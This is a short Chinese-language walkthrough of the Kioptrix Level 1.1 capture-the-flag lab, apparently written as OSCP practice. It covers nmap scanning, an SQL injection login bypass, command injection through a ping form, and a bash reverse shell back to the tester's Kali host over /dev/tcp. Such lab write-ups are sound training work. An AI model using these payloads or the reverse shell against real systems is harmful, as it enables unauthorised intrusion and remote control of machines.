# Sub. Kioptrix: Level 1.1 滲透過程 (#2) ## 建立練習靶機的資料夾 * mkdir oscp-ctf/mkdir Kioptrix2 * cd oscp-ctf/mkdir Kioptrix2 * 結果存成txt xml檔案 * nmap -n -sn -sP 172.20.10.* -oG Kioptrix2_ip.txt * sudo nmap -p- -sV -sS -T4 -A -oX Kioptrix_lv2.xml 172.20.10.5 1.ip c -a 先確認自己的ip 172.20.10.3 ![](https://i.imgur.com/MvzJwWB.png) 2.nmap 找到靶機ip 172.20.10.5 ![](https://i.imgur.com/UmEdoia.png) 3.分析port 發現有80 port 試試看直接打ip開網頁 ![](https://i.imgur.com/BwR1zan.png) ![](https://i.imgur.com/vJDNjPR.png) 4.直覺得試試看sql injection,在Username輸入 ' or 1 = 1 #-- - ![](https://i.imgur.com/Etr53T0.png) 5.登入後看到這個頁面,是一個提供 ping 功能的頁面,試試看 Command-Injection,成功執行了id的指令顯示結果。 ![](https://i.imgur.com/uimxvAD.png) ![](https://i.imgur.com/EzQ2PTP.png) ![](https://i.imgur.com/eHfB85n.png) 6.直接下命令,反彈一個shell到我們的Kali主機上 ;bash -i >&/dev/tcp/172.20.10.3/4444 0>&1 ![](https://i.imgur.com/8JMV4h0.png) 7.使用nc 監聽 4444 port,並成功取得shell 使用 uname -a 查詢系統版本 ![](https://i.imgur.com/eUo69XI.png) 8.直接用linux2.6的提權 ###### tags: `Sub-OSCP`